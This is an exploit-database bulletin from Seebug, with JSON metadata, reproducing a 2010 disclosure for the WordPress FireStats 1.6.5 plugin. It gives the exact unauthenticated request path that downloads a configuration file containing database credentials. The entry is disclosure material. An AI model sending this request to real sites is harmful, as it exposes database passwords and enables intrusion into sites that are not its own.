ID SSV:19937 Type seebug Reporter Root Modified 2010-07-10T00:00:00
Description
No description provided by source.
# Exploit Title: Wordpress firestats remote configuration file download
# Date: 2010-07-09
# Author: Jelmer de Hen
# Software Link: http://firestats.cc/
# Version: 1.6.5
# Tested on: PHP Do a simple GET request to this file:
/wp-content/plugins/firestats/php/tools/get_config.php
This will allow you to download a configuration file which contains the database username and password.
http://h.ackack.net/more-0day-wordpress-security-leaks-in-firestats.html
{"sourceData": "\n # Exploit Title: Wordpress firestats remote configuration file download\r\n \r\n# Date: 2010-07-09\r\n# Author: Jelmer de Hen\r\n# Software Link: http://firestats.cc/\r\n# Version: 1.6.5\r\n# Tested on: PHP Do a simple GET request to this file:\r\n \r\n/wp-content/plugins/firestats/php/tools/get_config.php\r\n \r\nThis will allow you to download a configuration file which contains the database username and password.\r\n \r\nhttp://h.ackack.net/more-0day-wordpress-security-leaks-in-firestats.html\n ", "status": "poc", "history": [], "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-19937", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-19937", "type": "seebug", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "viewCount": 2, "references": [], "lastseen": "2017-11-19T18:09:43", "published": "2010-07-10T00:00:00", "objectVersion": "1.4", "cvelist": [], "id": "SSV:19937", "enchantments_done": [], "modified": "2010-07-10T00:00:00", "title": "Wordpress Firestats Remote Configuration File Download", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": -0.5, "vector": "NONE", "modified": "2017-11-19T18:09:43"}, "dependencies": {"references": [], "modified": "2017-11-19T18:09:43"}, "vulnersScore": -0.5}, "_object_type": "robots.models.seebug.SeebugBulletin"}